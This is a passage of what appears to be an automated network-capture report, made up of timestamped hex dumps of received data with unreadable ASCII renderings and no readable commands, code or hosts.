3a d3 d9 a9 27 1a 87 c8 f2 ab 02 71 3b ec ac 72 b6 e6 97 63 5a 16 41 40 72 71 49 43 98 f5 16 ac 05 fa c2 28 e4 ff 1c 75 b2 b2 43 c8 3a 4f 8b 50 79 81 f8 44 e8 65 bf 12 92 13 bf e9 95 77 ce 29 60
                                                                  Data Ascii: "_^NrH5|a#'WY<34.FJLhCeO'b8.Wc}6@}\[mYH~.kqvG'yz") $[}>rg\-c;8 _" Z| U.:'q;rcZA@rqIC(uC:OPyDew)`
                                                                  2021-09-30 21:52:28 UTC2912INData Raw: ae b7 1d e3 63 46 b0 ae f8 0d 4b 09 44 eb 50 f3 48 c1 ef 51 f0 7a ad 61 81 d2 bc 94 d6 53 ad f3 e7 e0 a5 e2 ea 52 71 82 0c 10 44 f9 cc ac 1d a6 34 bf 3c 51 d0 a1 c2 7f aa de f8 2f aa af 2b af f4 56 5a 84 58 95 ab e2 db 50 e7 f6 c7 ad c6 fa 3c 5c 62 30 6f e3 84 2b 91 59 fb da 89 3a 0f 30 71 88 3f c9 64 ca 7d 67 95 3c bf 9c 94 d0 aa 22 f5 25 f3 6b 01 66 43 f5 bd f7 2c f5 3f d9 bb f4 b5 dc 72 75 06 e6 3b cb e0 16 b8 ed 05 e3 8a 60 66 0e d8 8f 33 18 b7 0b d0 64 72 a1 73 c4 b2 8b e9 6e 72 7f 00 be 2d 23 ed d3 c7 05 40 40 8d 8d 77 fd 8f 72 8f 7e fb 02 cc 65 23 52 ae 58 40 e0 c7 52 04 17 16 7b 89 38 24 cc 93 92 b9 b3 26 c8 1d 2c dd ac 73 75 69 88 84 88 99 e5 d9 5a 80 77 57 59 b0 ac 29 7e 68 ff d0 61 ed c6 e0 ae a9 79 25 81 ad fa 96 ff cc 15 b4 78 48 25 fd 27 89
                                                                  Data Ascii: cFKDPHQzaSRqD4<Q/+VZXP<\b0o+Y:0q?d}g<"%kfC,?ru;`f3drsnr-#@@wr~e#RX@R{8$&,suiZwWY)~hay%xH%'
                                                                  2021-09-30 21:52:28 UTC2928INData Raw: c9 a5 77 9d b7 fc 5a 52 bb 11 d7 07 fc b5 04 4a 7e b6 ed e0 b3 9a db 7e b3 27 a4 cb d3 f3 be 39 6c 59 f1 e6 d3 ce 85 23 c8 86 79 5b cf e9 dd 8d 69 d2 34 5b ea c9 1f 26 4b db 28 b8 8c 1b 09 9c c9 17 84 ea 4d c6 5b 3c 5a 5e 81 5b 86 e7 82 a9 60 75 60 6a 8f 1a c5 c3 16 5b de e9 e7 74 9b 0c 2a 03 cd 07 85 aa 83 54 e5 2d 60 e3 c8 f6 92 08 5b 67 b2 71 ee b4 52 b5 5b 22 2c 03 5f 73 8e e0 92 47 4a 77 9d 6c 20 54 15 83 a7 f2 84 92 b0 2b 5c f8 83 a6 0c df ba 99 c5 ee d5 67 5e 8d 90 f1 79 73 75 63 83 12 27 06 ba 72 19 54 90 71 f6 d4 5f 8d a6 06 0a 73 43 92 ab 84 fa 5d f7 9d 35 a9 e7 56 0c 46 48 0f 97 3e 19 2f 3c cb b9 0c 23 b7 ff 39 34 1e c2 79 0b 89 bb cc ea 2e 8f fd e4 e6 e7 03 be 1a c7 90 9e 4e fc 71 75 74 96 ff 72 6d d4 ee 4d f3 09 4c 46 94 32 60 48 f1 f2 bd e0
                                                                  Data Ascii: wZRJ~~'9lY#y[i4[&K(M[<Z^[`u`j[t*T-`[gqR[",_sGJwl T+\g^ysuc'rTq_sC]5VFH>/<#94y.NqutrmMLF2`H
                                                                  2021-09-30 21:52:28 UTC2944INData Raw: 52 6e e7 41 fe 87 2d ff 18 fc 9c 32 1f e3 e6 9d fa 5a aa b0 91 8a 1e 95 6a 46 86 6d c5 1f 20 2d af f6 b6 e9 cc 01 c7 90 31 41 d1 db 4d 5d c3 3c 98 f5 00 a4 5d e9 44 87 de 3a 79 78 cd c0 ee c4 83 63 6d 7b c3 0b 8d da 1e fd 93 39 fc fa b7 90 2b 09 fa 67 92 ff b4 ed 6f bf fe c6 47 38 97 ce 87 34 cc 24 49 8f 71 bf bd ff ac e7 c5 50 2d 1d 8a 02 d8 ce 71 df 5a ae d6 3a f2 a0 db 8e 63 48 34 22 35 be 9f 48 f7 1a a5 e6 a1 08 72 5a 15 1e e6 ea 20 d8 5b a4 32 a0 bb cc 39 ab 33 6e df fa 5a 52 94 cf e9 94 c7 d7 b9 ea f5 0d 59 e4 a2 da 1e 3a 67 8e ac 51 c6 f9 41 de 36 65 88 f9 90 74 cf cd af e5 b9 90 53 cb 51 3b d4 4f fe 44 58 a0 c8 04 ae 9f 38 58 36 b5 be 2b da 61 f6 e9 74 c9 b1 63 4f 12 b0 74 f0 78 d9 15 25 41 df 3c ae b4 ee ba a3 92 b5 95 8d 63 ca bd 64 a2 d5 d2 23
                                                                  Data Ascii: RnA-2ZjFm -1AM]<]D:yxcm{9+goG84$IqP-qZ:cH4"5HrZ [293nZRY:gQA6etSQ;ODX8X6+atcOtx%A<cd#
                                                                  2021-09-30 21:52:28 UTC2960INData Raw: a6 48 de 51 3f ea 36 26 b2 26 21 68 70 86 22 44 b7 02 56 56 0c cc fe c6 45 4c 8c a2 2c 0e fe 63 11 c9 01 78 ff 29 d3 22 ac e8 af e5 cd e3 83 20 fe a7 04 36 b7 0d 18 3c fd 41 18 79 86 57 74 e9 94 30 d2 85 e6 6c cb 19 d8 35 33 87 43 38 5b fe f9 bf a5 1f 23 d0 13 98 d8 96 6e 3c 72 96 3e b5 02 1f c8 49 d8 0f f7 4f 7e be 7a 1d 4b 8b 9d 83 e9 dc 20 e5 5d 8f 57 6a e8 14 80 29 81 ae ac c5 71 03 2d 97 18 22 d7 41 b6 d7 fb 1d 32 31 e0 b6 c4 0a 05 a2 0e 93 78 b3 40 a1 d9 2a 92 88 41 3f a0 05 c5 ce b5 8c bf d1 c1 01 5c be 16 4c d2 22 c4 5f 92 40 2f ad 91 43 8c 21 f8 96 70 57 4b bc f5 16 ac f8 8c a3 3f 2a 06 5b 84 41 90 84 d7 ea 64 22 24 ed a6 21 17 c4 d8 4e f5 35 0d 80 7f 13 29 b2 1e ac 71 c4 60 d4 7c c1 0a 3a 6e 77 03 8c 2d aa 9d 35 8c f6 54 3a 9c e8 36 b3 90 15 eb
                                                                  Data Ascii: HQ?6&&!hp"DVVEL,cx)" 6<AyWt0l53C8[#n<r>IO~zK ]Wj)q-"A21x@*A?\L"_@/C!pWK?*[Ad"$!N5)q`|:nw-5T:6
                                                                  2021-09-30 21:52:28 UTC2976INData Raw: bc 6d c4 fd b9 4d 58 28 20 23 7a cc 32 0f 6c f7 b4 35 7c 7b 6c 1f 3a d3 2b 04 90 3f 01 a7 bd 64 db 5b 8f 9c 14 97 75 90 a9 ad 07 94 61 ec ed 07 98 cb 10 76 8d 7f de ed 41 77 7f c4 5c 23 e6 61 9a a5 25 24 26 75 34 92 dc ec de 90 8f f1 ea a5 4a e8 5e 4a b3 96 ef 88 f0 c7 a3 87 35 04 83 54 71 96 8d 4a e9 f6 30 f2 cf 33 56 d2 ac 56 1b 8a ad 79 e3 59 70 20 a2 0a b0 75 3e ed f7 37 1f 77 ff 14 ab 0d 15 3d 56 b6 8d bd 22 8f 0e 09 7a b3 a9 a0 82 d7 34 7f b9 de 46 26 3a 72 8f 75 49 ac 5a 75 92 18 23 e4 66 1e 9c d2 50 94 b9 68 07 62 52 e2 02 99 b9 aa 5c 96 ef 80 70 1a 64 b9 2c e4 ef 8e 77 97 9e 69 84 0c cd 4d 45 c3 a7 58 bd 5b 08 01 ee 1f bf d0 68 6b 3e 20 d1 ce 91 c9 f4 44 f2 3d 67 89 77 71 7b cd dd d9 2d e0 6e b2 f7 11 74 d7 31 ee 96 ae ae 12 d2 0d bb 2e f5 fa 42
                                                                  Data Ascii: mMX( #z2l5|{l:+?d[uavAw\#a%$&u4J^J5TqJ03VVyYp u>7w=V"z4F&:ruIZu#fPhbR\pd,wiMEX[hk> D=gwq{-nt1.B
                                                                  2021-09-30 21:52:28 UTC2992INData Raw: ea 59 7c 62 62 f7 44 61 e5 f2 e2 49 f1 73 57 f3 45 cd 28 5c 89 39 9a 53 da 28 31 a0 b0 16 e1 fb 0e 10 02 0c 6a b8 c8 5c b2 e4 f1 a8 8c ae 03 7b 4b 2d 4b 09 25 72 84 c1 70 2c 10 1a c9 6c 2c 45 3a 0a 88 2b ff c3 f4 c6 a3 63 d2 6d b8 c3 75 97 29 fc f8 19 7d 44 2a b6 bd 0c 76 32 86 cf 5c f4 67 49 0f d5 0e 8f 4d c1 71 8c bc ad 5b 22 3b c6 95 23 39 df 54 2c 15 6d 26 b9 b8 08 85 71 df 5b b8 9d 9d 3b 8b 37 97 99 25 d9 cc b1 68 f8 be ec fc 82 ac 41 55 65 02 dd c4 36 14 35 17 fd b1 d8 20 13 f1 49 3a 9c 09 44 d6 4d 85 63 4c 76 ca f7 b3 b4 e6 da ec 5e 41 5f bf b1 2e 77 95 03 22 51 f0 e4 35 2b f0 24 d3 5b a3 61 cb 38 51 3b 34 da 35 60 fe b5 24 7e 3f 00 28 a4 87 b6 f4 ba 17 9b 53 48 b4 88 e4 cb 9c 7a db 27 03 ff 7a 51 24 20 0d e4 58 eb 76 10 ff 5d 57 30 f4 ba 71 47 d7
                                                                  Data Ascii: Y|bbDaIsWE(\9S(1j\{K-K%rp,l,E:+cmu)}D*v2\gIMq[";#9T,m&q[;7%hAUe65 I:DMcLv^A_.w"Q5+$[a8Q;45`$~?(SHz'zQ$ Xv]W0qG
                                                                  2021-09-30 21:52:28 UTC3008INData Raw: 93 94 3c f7 06 35 63 a1 14 f4 22 6a 75 cf a4 ba 5a c7 e8 cd 3d 61 f5 ee ef 0f 2d 36 d8 79 ad 25 23 6a 4d 1d 2e 61 0b fb 34 ce 94 67 14 92 51 d8 fc 54 04 34 23 d2 ad 98 58 d5 6d ee e1 c0 f4 74 61 a0 1d 8b 45 f9 a5 60 75 a7 9f c8 96 3e 77 a8 a0 5c 21 5d cd ce 27 e6 a5 95 9b 41 8b a2 2d 3f 77 c8 65 5a f2 15 c2 79 7b 08 fb 86 13 a0 ee c9 4d cc a0 56 a2 d1 4f 53 0f 25 5b b0 16 fc ca 5d 2d df e2 86 ea ee 2f b2 50 95 cd 9e f5 6f 7f e8 81 cd 49 09 39 a3 69 16 64 f8 f9 6d 3d f8 dc b1 5c ab 19 b1 cd c5 67 42 a3 6c 38 ac 3e 2f b7 5d e6 a2 f1 95 d2 da 4a ef 65 a3 23 c9 ed d7 83 52 50 74 9b 5e 95 0b c6 b7 df f0 bf 6b cc ee 29 91 27 95 c4 bf 2f 0c 3e 93 52 e7 fb 20 c5 7f 14 95 2a 15 7e 05 bb c0 69 a6 cd 8c 59 7f 73 ae 16 a0 de 45 39 7a c6 83 e4 a2 5a 4f c6 db 75 c2 d3
                                                                  Data Ascii: <5c"juZ=a-6y%#jM.a4gQT4#XmtaE`u>w\!]'A-?weZy{MVOS%[]-/PoI9idm=\gBl8>/]Je#RPt^k)'/>R *~iYsE9zZOu
                                                                  2021-09-30 21:52:28 UTC3024INData Raw: 2c e4 e4 4a ad 31 5e 5f c6 0f 14 4e b4 1f 68 64 ca a5 86 2b b9 d1 cc f7 4d 21 2e 09 ed 12 79 21 37 f7 10 e5 87 f6 1c ba d5 a1 1f 3d be 07 d9 8f 60 3b ff 71 75 fb 2d da 12 fe 4f e8 84 13 58 c3 42 d7 8d a6 df 16 a5 c6 71 44 0d a8 98 02 d6 d7 99 c1 fb f7 ce 19 21 9f 3d 73 bc e1 36 e7 4e 9f 7f 3c 8c 4c 70 c2 39 f6 77 34 16 61 d9 56 ee 6a 46 b8 bb 70 56 c5 85 8e a4 5a 71 66 ae 0b 00 9b 8f eb 18 8e 63 91 2e a7 d3 15 02 df 46 4f ca 39 0a 82 13 f9 e5 1d 9e 93 97 95 7e d6 30 20 4e b6 49 a5 e5 1b d4 b9 3e 0f 3e 31 5c a8 7a 49 ca 27 05 e9 46 a5 55 bc a7 52 55 00 3a 7d 2d f5 03 7f 93 e0 2e 0d 75 26 9a ad 98 14 8a 96 63 20 16 bf 87 e5 68 57 26 7f 1d af 76 c8 7d fd 50 dc e6 76 ec fd 47 98 ec 1b da 7a da 49 c7 e2 7f 35 72 bc 93 a1 18 1f 03 f7 51 77 4b 33 d8 ca 0e af 53
                                                                  Data Ascii: ,J1^_Nhd+M!.y!7=`;qu-OXBqD!=s6N<Lp9w4aVjFpVZqfc.FO9~0 NI>>1\zI'FURU:}-.u&c hW&v}PvGzI5rQwK3S
                                                                  2021-09-30 21:52:28 UTC3040INData Raw: f7 c6 2c 63 ef 47 39 3b b6 b9 4c c1 3e 88 5f 2c cd 69 a1 55 08 e8 7b 66 05 d9 4b 5f e3 ef 11 f3 71 a7 23 d4 78 67 9b a4 62 96 db 63 0b 5c 5c 5b af 08 79 80 38 6b 2a fb 48 c1 c0 c0 83 e9 11 f1 67 d2 91 af a5 05 d0 18 48 10 9d d6 d5 b6 d1 36 df 21 f1 b2 19 5c d6 34 cb bd f7 e0 8e 65 d1 1f 50 51 d1 dc ee 54 d2 86 52 e4 e0 6e 06 7f f2 86 fb 58 62 92 62 20 2b ce 04 53 69 f9 95 0c c1 c0 2d b7 c5 db 28 af 6f 35 6a a4 fe be c2 ef 24 a6 6f 1a db 59 de c0 9e 31 7f 7c 6e c6 e8 55 b0 e0 f4 ce 64 7e 41 8e b2 db 59 93 a5 2c ef 26 38 30 fc 3a d8 62 d7 1c a9 38 31 e4 f4 b3 f2 83 f3 e6 d0 66 a0 8c b5 07 9f 4e 32 b9 d1 5b 29 50 07 60 f5 87 a6 da 88 b3 a9 be f0 a5 98 fa 9a 68 8e 80 87 20 de c7 d0 53 7a 2b a0 76 96 aa 49 fb d0 2e 21 99 c7 18 f3 6c ff ff 46 ee 57 05 d4 06 c1
                                                                  Data Ascii: ,cG9;L>_,iU{fK_q#xgbc\\[y8k*HgH6!\4ePQTRnXbb +Si-(o5j$oY1|nUd~AY,&80:b81fN2[)P`h Sz+vI.!lFW
                                                                  2021-09-30 21:52:28 UTC3056INData Raw: ad 0f 23 ba 45 14 76 96 86 82 88 26 bd 46 ed cb 88 e3 1d 7e 34 a1 5c 2a bf 7a 98 2b 70 80 9b cc 38 68 be ce 21 8d 8e 2d 4b 1f 31 4b 26 5a 24 a5 0d 16 a1 27 37 bf ba b8 0d 06 eb c9 0f 80 72 30 48 6b d0 b1 86 f3 40 aa 2c 9b 53 78 fa e5 6a 48 c4 54 92 bb c3 d4 19 f1 18 0b 65 b9 d6 6b bb 82 bd 10 31 26 42 08 38 c5 30 60 dd b9 cf a0 3c 76 e3 b6 ac a2 be 62 92 64 56 22 99 55 2a 81 14 5e a9 76 fd 14 cc 5e 02 c6 ed 2e 9a 47 10 14 8a a4 8f c7 03 31 52 71 cc 0e bc a3 44 59 c2 c8 82 dc 53 e9 95 02 09 88 b7 da 94 81 03 a1 87 4c e3 6e a1 2e 76 ec b0 ce f5 7c 0c 64 f9 37 23 dc 8b f9 cf 41 f6 ae 1c 8f 0c b7 98 2c cf 32 ae aa 20 0a 93 8a d0 d7 fc 62 ee c0 af 11 ee 18 ed 1a 09 93 ba 65 79 ad 26 48 10 e2 2c a1 77 6b 0f 4a ba a2 d4 af bb af dd 8e 61 7f 68 67 13 f8 10 bf 58
                                                                  Data Ascii: #Ev&F~4\*z+p8h!-K1K&Z$'7r0Hk@,SxjHTek1&B80`<vbdV"U*^v^.G1RqDYSLn.v|d7#A,2 bey&H,wkJahgX
                                                                  2021-09-30 21:52:28 UTC3072INData Raw: 0e 7f ba 39 20 e1 fd 67 44 74 61 64 0c f5 20 a9 2b 9a 9b 50 68 e6 f8 95 42 c3 32 bd 38 98 85 60 09 59 6f f3 57 bd 1d a3 80 89 ea 14 f7 c9 02 af 08 64 33 4e 3d 52 ca 3a 00 ab 3e 80 34 17 44 eb 79 71 8a de 0d 94 ea 5d 2d 8c 4f 50 32 37 a2 74 28 ea cb 1a 2e 0b 59 b5 d6 d2 b9 43 c3 c8 53 f9 94 99 69 f3 97 88 8a 09 45 f2 ad b3 78 cf 59 e0 86 49 c1 72 51 70 7b a8 30 70 d8 89 18 4e 74 98 56 83 fb 81 95 1d 16 bf dd ac 41 a4 48 9f d6 38 c3 2b e7 41 d2 5e 20 35 1b 08 c1 70 81 5a 1e ce 77 97 9f 59 ab b6 5d 6b 48 41 35 1f 06 2b d9 14 d1 0c 54 90 c8 68 dc c0 fe e0 18 ca c6 01 2a 33 78 47 ff 5e 28 f3 ab dd 29 b3 6c b6 f5 5b f9 d9 82 d2 66 35 b5 b4 f9 06 13 26 02 c9 18 c2 2c 78 10 1a 16 a3 a2 bc 9b c1 c8 e2 e3 30 f8 b0 72 4c 57 05 f7 d6 c5 d1 0e 9d 8b 59 f7 ad 0f 09 82
                                                                  Data Ascii: 9 gDtad +PhB28`YoWd3N=R:>4Dyq]-OP27t(.YCSiExYIrQp{0pNtVAH8+A^ 5pZwY]kHA5+Th*3xG^()l[f5&,x0rLWY
                                                                  2021-09-30 21:52:28 UTC3088INData Raw: f0 5f 07 87 2f 85 06 21 bd 32 da 64 0e 0a 87 95 47 52 2f 01 fc bd 62 88 12 0e 8a 6d 47 66 2a fe d2 1b 0c a1 5a 18 ba 5f de c9 c0 94 73 63 95 fe b9 25 1e 81 ac d2 ca e5 a9 91 90 de e2 1e 81 72 05 7c 88 da 56 71 8f 31 ff bc a6 d5 bd c4 52 6b b5 7a 01 d1 cd de 39 03 0d 3a 2b 25 47 69 26 ae 00 5c 52 26 26 5c df 52 4a 73 d5 dd cd fa ee 33 81 63 16 3d 91 43 08 fe 55 e7 5b 27 93 52 f2 b2 2e 11 30 c2 43 69 0a 79 71 10 70 5f 47 f9 19 3a 49 4f 90 a6 71 fb bf 5f 90 2a 68 46 0c a0 fc e6 ce f6 09 5f e6 38 1f 57 c1 cd dc 34 2b 3b b8 d7 78 64 2d e7 e2 2e 3d dc a3 fe 91 0d 44 53 65 29 36 e5 81 23 34 a4 34 d2 bf 26 0b d1 35 76 1e 70 13 39 1c 1c 10 ed f2 00 63 6f 27 3f d5 c2 48 b9 ae 77 82 d0 eb d8 ac c1 4e e2 17 0e ec c4 87 e0 57 f3 2e c3 36 6d d2 ea 05 0c cc 25 a3 32 20
                                                                  Data Ascii: _/!2dGR/bmGf*Z_sc%r|Vq1Rkz9:+%Gi&\R&&\RJs3c=CU['R.0Ciyqp_G:IOq_*hF_8W4+;xd-.=DSe)6#44&5vp9co'?HwNW.6m%2
                                                                  2021-09-30 21:52:28 UTC3104INData Raw: 0e 51 30 ae 71 a7 e1 95 11 91 2a b6 0c 83 e3 4a 59 a5 ea 7b 1f b3 ad 4b 9a a9 df f9 d2 8b 76 ec 75 d1 8f d6 53 43 df 00 5c 33 e9 6e 2d df d2 46 5c ac 14 5b 14 b8 ed 62 54 4d 1b f5 aa 25 00 17 a5 c6 68 85 fd b1 2a 29 01 d1 7a 1c f5 69 98 3b b9 e5 2e 6d 04 b7 2a a1 57 35 ad 74 fc 8f ba bc 2d d1 81 19 d6 6e fc 38 d0 d4 44 6c 65 f8 0e 99 43 de 2b d5 81 cf a5 73 1d 07 26 14 92 57 0f 3e 5d ef 3d 55 f9 87 54 85 fc 4d fe 6c 95 45 ed 8f 87 b1 be bc f1 ea cb 0e f9 da c0 17 9b 5b af 92 e0 c9 f7 cb 24 70 7b f7 34 93 82 0a ca 20 68 36 d5 4e 0b d0 3b 1e 05 fe ea 10 09 39 d2 67 41 35 9b eb 30 c6 cb 3b 88 bf dd f5 d7 7c 27 19 1b 7b 26 7f 11 0e ac eb 48 7f 68 58 ce 23 35 0d ff 00 10 fb a5 46 82 d9 63 64 40 da b5 51 f5 94 8a 07 b0 05 ba 9e 1f 16 86 3f 99 c8 5c f7 e8 59 e6
                                                                  Data Ascii: Q0q*JY{KvuSC\3n-F\[bTM%h*)zi;.m*W5t-n8DleC+s&W>]=UTMlE[$p{4 h6N;9gA50;|'{&HhX#5Fcd@Q?\Y
                                                                  2021-09-30 21:52:28 UTC3120INData Raw: d3 15 12 c2 72 96 d1 95 40 38 92 bd 5b 35 3c e3 4b c4 15 9e 64 35 db 40 89 c3 72 51 f9 67 3f d7 0a 3d f7 b1 4b df f9 22 da d9 ac 89 f9 db e8 7f 45 ff 75 2a 6f ea 9f 23 17 ba 5d a5 4f ae 7b a8 33 7f 15 b3 08 c5 c6 01 c7 ee 74 c6 d3 62 69 f8 1a b7 48 59 9d 7b 2c f5 ed 4d b8 0d b9 87 b4 67 d4 ad 83 e3 42 24 7e 31 d7 22 b8 1c 9a 59 f0 99 2f b1 b5 37 e3 89 3a 7e 06 d1 29 7b e1 2b ed 50 bc 64 ad a9 59 ea de d3 a3 ab 67 d0 8f 47 ae 9b 21 42 db 70 0d d3 f6 b8 ca d3 a9 4a ca 6b 88 7c 3d 3f d9 14 40 88 96 04 9d 9b a9 d2 0a 25 4f 0e af d5 33 63 92 d3 31 74 a3 24 8b 14 74 1d 37 a3 c0 38 0c b9 c7 6a 9f fd 8d 15 0d f2 66 b5 cc 85 2b 41 1b 9a 02 91 f0 8a 6b f7 0f 6d 11 ba 97 ee 65 2d 41 30 5f d3 5c 60 b0 cc 78 13 31 34 cd c0 67 76 0f a1 a7 d8 31 5b 60 8f a4 7f b3 03 c5
                                                                  Data Ascii: r@8[5<Kd5@rQg?=K"Eu*o#]O{3tbiHY{,MgB$~1"Y/7:~){+PdYgG!BpJk|=?@%O3c1t$t78jf+Akme-A0_\`x14gv1[`
                                                                  2021-09-30 21:52:28 UTC3136INData Raw: 14 82 15 1f 60 ac 1d 39 cb 3b d1 d8 26 05 b1 bf b9 0a b1 25 7b 4b d8 51 67 eb 4d d0 35 60 7b ec 20 7a 77 60 fb 6a 30 cd f0 f6 c7 10 1f 21 c2 5c ae fc 54 9e b4 49 75 6e ef dc 32 9b ae 37 13 d7 3f 0d e7 f6 77 a7 f2 3e 1d bf 23 64 5f f6 7a cd be 34 cb 31 c7 16 f8 b4 1a b6 f3 da cb 91 98 06 43 c9 0f c2 24 2f 59 1f 71 de ca 10 f8 52 39 05 00 74 2e 0d f4 f3 8a 50 51 47 ae 76 6b 52 49 69 f5 34 40 15 9e dc 58 48 d9 11 4a b4 e0 d1 be 1f b2 7a 4e da 3c a9 6b 51 70 77 1e 66 58 cf 9b 5d 4e b4 0d 4c a8 d4 37 87 53 c4 22 db 42 f0 2a fc 36 fa b9 88 35 9b a1 98 55 a0 df 48 53 43 a7 28 63 1d 43 c0 5c 93 3f 5c 3f 2a 1f af 18 a1 77 7a e7 b8 26 69 d8 03 97 91 0e e1 52 c5 d8 25 4f da 8c 2e 98 e8 d1 c7 a4 a2 b9 4e d0 6e cd 1b f4 9f 88 66 b3 7a 99 7a 8a 30 6b 36 11 21 b8 86 c7
                                                                  Data Ascii: `9;&%{KQgM5`{ zw`j0!\TIun27?w>#d_z41C$/YqR9t.PQGvkRIi4@XHJzN<kQpwfX]NL7S"B*65UHSC(cC\?\?*wz&iR%O.Nnfzz0k6!
                                                                  2021-09-30 21:52:28 UTC3152INData Raw: ec 8e 35 62 60 f0 cc 10 22 7e 49 9b d0 24 a0 4f 9f f1 1a d8 e8 27 d2 8e 20 c0 4c a7 6e a0 96 bb 0e 88 0c ef a2 73 fa b8 f4 88 93 3d 2b 99 37 d1 98 a9 21 45 52 68 c5 50 1a 99 80 0d b7 53 d9 0f 33 c0 f8 0d c6 6a dc 17 9b 9b f0 5a 8a 82 d6 48 f0 31 2c a0 89 fd e5 92 e4 d9 95 6b 0d 74 65 6e 67 0e e0 06 d2 5c e0 e5 10 12 f4 03 29 c4 33 06 e5 98 af dc d4 63 f6 88 47 01 0f 54 5c 0e bf 8b 56 75 dc 5b b2 ad c8 f0 46 f2 3a a2 e1 4d 8f e7 b4 e6 4b 07 93 54 42 ba 9c c6 06 37 b1 7c c6 eb 4d 18 9c 72 15 a8 0c ef bd a9 66 25 53 e0 ac d2 61 6e ef dc bb 3d 03 3f 49 b9 84 37 35 87 be eb bd f6 04 17 35 71 2e b9 47 8d 40 1f d2 a1 d6 4f 76 3e bf 9c 9d d1 be f6 48 14 45 fe bc 57 6b c2 94 06 e8 15 0d d6 49 17 ce a2 b0 42 7a 4b c6 a8 a2 92 6c cd b3 00 18 ce e9 3c c9 5b 8a dc 91
                                                                  Data Ascii: 5b`"~I$O' Lns=+7!ERhPS3jZH1,kteng\)3cGT\Vu[F:MKTB7|Mrf%San=?I755q.G@Ov>HEWkIBzKl<[
                                                                  2021-09-30 21:52:28 UTC3168INData Raw: 7d 07 7c 2d ab d6 4c e0 92 a6 cf ac 0b 9f 7c 43 bd f9 fc 73 49 33 21 14 5f cd 4d 9b 63 38 b8 4f e9 91 ba e5 f7 18 22 c7 8f ad c4 a5 b5 6c 0a 4b 13 6b a4 e2 7b 48 74 00 26 54 0a 90 75 09 cb ce 9b 00 9c 6d a1 8d 0c 32 bc 5d 28 02 b6 c6 95 2d 19 80 0e 01 c5 13 66 49 cf 20 ae c1 92 d0 e8 ef 2a 9c 57 1d c1 ff c3 40 75 6a 23 08 94 d6 8b ce 95 a6 e3 f0 25 44 f3 be 50 3f 93 38 df 95 af 3d f8 b9 f3 d9 43 52 0d 41 37 31 5e 75 82 3e f9 0a 28 35 7f 66 65 14 6a 51 c3 e1 49 d7 04 d1 44 4e 5e 9b 58 1b 1a 52 b7 95 00 6e 04 66 ea 59 5a 8b 57 20 bc b4 dc d2 2b 07 26 94 fd 4d dd 53 4d 73 94 c6 ab 93 bc b9 d2 86 d2 6c ed cb 23 f4 52 f7 f7 5b 8c 8f 88 a6 6e 4c d0 b8 d2 af 93 c3 c1 0b f3 98 0c 53 46 26 a6 28 41 54 33 a1 2b 7f 81 18 1f b0 1e ef c4 4d c9 8a f9 1f 2b f0 c2 f3 60
                                                                  Data Ascii: }|-L|CsI3!_Mc8O"lKk{Ht&Tum2](-fI *W@uj#%DP?8=CRA71^u>(5fejQIDN^XRnfYZW +&MSMsl#R[nLSF&(AT3+M+`
                                                                  2021-09-30 21:52:28 UTC3184INData Raw: 43 da bd 11 4d 15 00 94 05 b8 dc 95 35 33 3a 07 dd ef 47 af b0 d4 c2 3f 49 d3 8d 2c 24 fe 42 9b f1 8e 65 0a 4a 22 c0 d6 b5 43 79 7e 6c 4d 27 01 aa 0a eb c2 f3 8e 75 eb c2 d5 de 39 b1 bd 06 e6 49 20 ec ca 25 13 0f a9 b3 58 1d ce 2c 6d ee e8 f3 11 9b de 84 3b fc 47 81 e1 b3 47 a4 db 68 53 c7 83 b3 e2 db fc 04 25 8a 3b be 5d e7 73 52 53 59 45 9c f1 54 49 7f 5c 2c b3 52 8a b8 d3 c0 ba 4e 4d f1 57 44 4c d4 5d 13 a7 33 ea 3a 33 6b c8 99 4e 65 c2 04 95 9e 3b d4 92 10 e8 b0 36 f2 26 cc 83 3c c9 0b dc 5f d9 09 6b 58 25 9a c4 d3 bc e5 97 c7 ed 12 73 75 11 5e 12 e6 6e f8 b5 0b a4 7f 84 eb 21 0f fb f0 97 f3 bc 3a 6c 18 a1 9d af 4b b4 f8 8f 55 94 d7 20 fc ae 6b 48 dd 98 06 0f 45 a2 28 f0 4c a2 94 0a cc 22 68 0f 54 c8 b6 cf 83 60 f2 73 f6 99 84 1e 1f 1e 70 b5 43 e7 ef
                                                                  Data Ascii: CM53:G?I,$BeJ"Cy~lM'u9I %X,m;GGhS%;]sRSYETI\,RNMWDL]3:3kNe;6&<_kX%su^n!:lKU kHE(L"hT`spC
                                                                  2021-09-30 21:52:28 UTC3200INData Raw: 5d f9 3e fb e0 af cc 67 c7 e6 d8 6d ab c5 b5 2c 4d cf 56 55 8c fc d8 63 a0 79 ac 9a d8 f4 df bb 1a 76 d5 e9 99 46 53 12 31 01 92 cc 91 15 34 f2 8e 40 a0 38 61 65 18 fb f9 54 a7 76 0e 4a 05 17 dd 1d 15 e2 ee e0 74 55 dc 3e c5 54 3f 59 9b cd ea e7 b6 75 3d 45 7a c2 d5 e6 5d ba 7e 2f 0c 2a 23 5f 6a d3 6f 59 f7 a1 21 74 dd b1 00 e8 bd ab 02 ac 08 2c 33 82 d7 a3 bc 13 83 45 44 aa d7 d7 10 46 9b 1d dc 84 d9 c4 2c 7b aa 7c d6 9f 94 0e 4e 5c c6 3b f1 ba 01 02 be 65 72 46 a8 ec 05 4d 6d 8d a7 b4 f9 6f 89 04 7e 41 ea 42 17 ee 85 03 41 fe 4c 60 3b 8e e3 06 b1 c8 d1 3f 9e fa 65 37 85 c3 e1 45 c5 29 1e 45 4e be 70 7c ef 15 e7 0e 8f 5c 30 dc 92 d8 95 3c b3 35 12 69 f8 14 b8 ab f6 a3 fc 2e 5a 2b 48 9a d5 db db 1d 4d 76 37 10 7f fa b0 e8 8b e8 3e 1a fb 87 44 51 44 ba 72
                                                                  Data Ascii: ]>gm,MVUcyvFS14@8aeTvJtU>T?Yu=Ez]~/*#_joY!t,3EDF,{|N\;erFMmo~ABAL`;?e7E)ENp|\0<5i.Z+HMv7>DQDr
